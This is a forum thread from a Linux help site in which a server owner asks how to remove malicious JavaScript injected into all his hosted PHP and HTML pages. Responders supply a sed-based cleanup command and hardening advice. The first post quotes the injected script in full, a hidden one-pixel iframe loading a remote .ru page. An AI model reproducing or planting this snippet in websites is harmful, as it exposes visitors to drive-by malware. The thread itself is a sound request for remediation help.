LinuxQuestions.org
Register a domain and help support LQ
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices

Reply
 
Search this Thread
Old 11-16-2012, 03:59 AM   #1
saran_redhat
Member
 
Registered: May 2009
Location: chennai
Posts: 247

Rep: Reputation: 16
Malware affected


Hi friends,

I have lot of websites hosted in my linux box. IN my websites content the following code was injected to all my php and htm pages.

<!--744345--><script type="text/javascript" language="javascript" > (function () { var denr = document.createElement('iframe'); denr.src = 'http://ivkikcop.ru/count9.php'; denr.style.position = 'absolute'; denr.style.border = '0'; denr.style.height = '1px'; denr.style.width = '1px'; denr.style.left = '1px'; denr.style.top = '1px'; if (!document.getElementById('denr')) { document.write('<div id=\'denr\'></div>'); document.getElementById('denr').appendChild(denr); }})();</script><!--/744345-->

can any one tel me how to remove the above injected code to all my htm and php pages.
or other scripts please help on this .
I am using centos5

Thanks
 
Old 11-16-2012, 05:08 AM   #2
eyanu
Member
 
Registered: Jul 2012
Location: kampala,Uganda
Distribution: backtrack
Posts: 87

Rep: Reputation: Disabled
Hey, i've been reading alot what you're facing looks like alot of work, if it's the whole server, however it's possible and i landed on this. Hope it helps you.
http://stackoverflow.com/questions/1...th-same-prefix
 
Old 11-16-2012, 05:45 AM   #3
saran_redhat
Member
 
Registered: May 2009
Location: chennai
Posts: 247

Original Poster
Rep: Reputation: 16
Quote:
Originally Posted by eyanu View Post
Hey, i've been reading alot what you're facing looks like alot of work, if it's the whole server, however it's possible and i landed on this. Hope it helps you.
http://stackoverflow.com/questions/1...th-same-prefix
Hi,

Thanks for the reply.
I am sorry, I can't understand script. please give any other solution.
Thanks
 
Old 11-16-2012, 06:02 AM   #4
eyanu
Member
 
Registered: Jul 2012
Location: kampala,Uganda
Distribution: backtrack
Posts: 87

Rep: Reputation: Disabled
That's bash scripting, i would advise you read about it so that you don't screw up everything. If you don't know any scripting/programming then am sorry you might have to do everything manually.
 
Old 11-16-2012, 06:38 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,279
Blog Entries: 54

Rep: Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852
Quote:
Originally Posted by saran_redhat View Post
can any one tel me how to remove the above injected code to all my htm and php pages.
This should do:
Code:
find /path/to/docroot /home/user/docroot -type f -print0 | xargs -0 -iX sed -i_infected "s|<\!--744345.*/744345-->||g" 'X'

Quote:
Originally Posted by saran_redhat View Post
I have lot of websites hosted in my linux box.
Be aware injecting I-frames is just a symptom.
The cause is the hosting company or you running outdated software, 3rd party plugins or not running things like they should. Fix that.


Does the fact that you seem to be located in Chennai signify anything wrt server ownership and responsibility? Are these servers you manage for a company or your own private servers? I'm asking because you seem to have structural problems going back to when you registered:
http://www.linuxquestions.org/questi...4/#post4761768 (2012)
http://www.linuxquestions.org/questi...2/#post4211065 (2011)
http://www.linuxquestions.org/questi...6/#post4135627 (2010)

Last edited by unSpawn; 11-16-2012 at 06:52 AM. Reason: //More *is* more
 
Old 11-20-2012, 06:56 AM   #6
saran_redhat
Member
 
Registered: May 2009
Location: chennai
Posts: 247

Original Poster
Rep: Reputation: 16
malware

Hi,

Thanks for the reply.

Is there any other way to find out how the malware attack happened all my websites. Please Give some ideas.

Thanks.


Quote:
Originally Posted by unSpawn View Post
This should do:
Code:
find /path/to/docroot /home/user/docroot -type f -print0 | xargs -0 -iX sed -i_infected "s|<\!--744345.*/744345-->||g" 'X'


Be aware injecting I-frames is just a symptom.
The cause is the hosting company or you running outdated software, 3rd party plugins or not running things like they should. Fix that.


Does the fact that you seem to be located in Chennai signify anything wrt server ownership and responsibility? Are these servers you manage for a company or your own private servers? I'm asking because you seem to have structural problems going back to when you registered:
http://www.linuxquestions.org/questi...4/#post4761768 (2012)
http://www.linuxquestions.org/questi...2/#post4211065 (2011)
http://www.linuxquestions.org/questi...6/#post4135627 (2010)
 
Old 11-20-2012, 07:32 AM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,279
Blog Entries: 54

Rep: Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852Reputation: 2852
Quote:
Originally Posted by saran_redhat View Post
Is there any other way to find out how the malware attack happened all my websites.
Like I said before the main reason is running outdated versions of software, third party plugins or not running software like it should be. The latter includes issues like running all web sites in the same shared hosting environment, web servers running default configurations, PHP configuration allowing dangerous HTTP methods, lax file access permissions, installers that aren't cleaned up, unrestricted access to management interfaces, leeched FTP credentials, compromised SSH accounts, no hardened PHP, web no application firewall, no testing whatsoever, etc, etc.

There is no single configuration setting, not a single task to perform and not a single process to run to "fix things": the base has to be sound to have any effect and continuous auditing and maintenance are required. Start by assessing if the OS is properly configured, hardened and maintained, then assess if everything in your web stack is hardened and always up to date, then audit and test your setup.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
LXer: Up to a million Android users affected by malware, says report LXer Syndicated Linux News 1 08-04-2011 01:12 PM
[SOLVED] May have contracted malware. Yes, malware. Firefox on Ubuntu Fiesty. Seeking a fix drachenchen Linux - Security 22 08-17-2008 01:05 PM
May have contracted malware. Yes, malware. Firefox on Ubuntu Fiesty. Seeking a fix drachenchen Linux - Security 1 06-12-2008 05:10 AM
Not Affected lakshman Linux - General 2 10-11-2002 10:01 PM


All times are GMT -5. The time now is 06:44 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration